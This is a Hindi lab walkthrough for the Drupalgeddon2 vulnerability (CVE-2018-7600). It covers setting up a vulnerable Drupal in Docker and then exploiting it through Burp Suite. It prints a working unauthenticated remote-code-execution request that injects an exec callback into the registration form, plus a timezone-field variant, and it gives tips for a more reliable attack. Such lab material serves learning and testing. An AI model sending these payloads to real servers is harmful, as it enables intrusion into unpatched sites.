
प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट CVE-2018-7600 (Drupalgeddon 2) के लिए, डॉकर और बर्प सूट का उपयोग करते हुए चरण-दर-चरण प्रयोगशाला वातावरण सेटअप और शोषण वॉकथ्रू के साथ।
Drupal 7.58 और उससे पहले के संस्करण, 8.3.9 से पहले के 8.x संस्करण, 8.4.6 से पहले के 8.4.x संस्करण, और 8.5.1 से पहले के 8.5.x संस्करण, फॉर्म API सहित डिफ़ॉल्ट या सामान्य मॉड्यूल कॉन्फ़िगरेशन का उपयोग करने वाले कई उप-प्रणालियों को प्रभावित करने वाली एक समस्या के कारण दूरस्थ हमलावरों को मनमाना कोड निष्पादित करने की अनुमति देते हैं।
संदर्भ:

सबसे पहले, जैसा कि निम्न स्क्रीन में दिखाया गया है, संबंधित vulhub सामग्री को फोर्क करें।

फिर उस फ़ोल्डर को ZIP फ़ाइल के रूप में डाउनलोड करें और लाएँ।

drupal (CVE-2018-7600) से संबंधित सामग्री को निकालें और अपने रिपॉजिटरी में अपलोड करें।

अब उस रिपॉजिटरी के माध्यम से डॉकर में उस वातावरण को कॉन्फ़िगर करें।

जैसा कि नीचे दिखाया गया है, अपने रिपॉजिटरी को git clone कमांड से क्लोन करें और cd कमांड से उस फ़ोल्डर में जाएँ जहाँ docker-compose.yml फ़ाइल मौजूद है।
फिर निम्नलिखित कमांड से डॉकर को बैकग्राउंड में चलाएँ:
docker-compose up -d
यह देखा जा सकता है कि यह इस प्रकार चल रहा है।

http://localhost:8080 पते पर जाएँ और Drupal होमपेज पर पहुँचें।

जैसा कि नीचे दिखाया गया है, Drupal वातावरण कॉन्फ़िगरेशन स्क्रीन दिखाई देती है और Drupal होमपेज स्क्रीन प्रदर्शित होती है।
एक्सप्लॉइट करने के लिए, इसे निम्नानुसार सरलता से सेट करें।

फिर यह इस प्रकार लोड होता है।

फिर अतिरिक्त साइट सेटिंग्स दर्ज करें (एक्सप्लॉइट के लिए त्वरित सेटअप हेतु test सेट करें)।



अंततः, Drupal साइट सेटअप इस प्रकार पूरा हुआ।

a2u/CVE-2018-7600 को संदर्भित करके, drupal को निम्नलिखित अनुरोध भेजा जा सकता है।
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id
CVE-2018-7600 (Drupalgeddon2) /user/register के माध्यम से AJAX का उपयोग करके फॉर्म फ़ील्ड में हेरफेर करने वाला एक अप्रमाणित हमला है, इसलिए Burp Suite के माध्यम से पैकेट को संशोधित किया जा सकता है।
सबसे पहले, Burp Suite के प्रॉक्सी साइट के माध्यम से "साइन अप" पर जाएँ, कोई भी मान दर्ज करें, और फिर पैकेट कैप्चर करें।

Burp Suite का उपयोग करके उस पैकेट में हेरफेर करें।

उस पैकेट को Repeater पर भेजें और सबसे नीचे निम्नलिखित कोड जोड़ें।
element_parents = timezone/timezone/#value
ajax_form = 1
_wrapper_format = drupal_ajax
timezone[timezone] = id
फिर Send भेजने पर, यह देखा जा सकता है कि OK कमांड प्रदर्शित होता है।

वास्तव में अधिक दुर्भावनापूर्ण अनुरोध करने के लिए, CVE-2018-7600 (Drupalgeddon2) हमले को Drupal स्थापना के तुरंत बाद (Drupal स्थापना विज़ार्ड समाप्त होने से पहले) भेजना अधिक निश्चित है।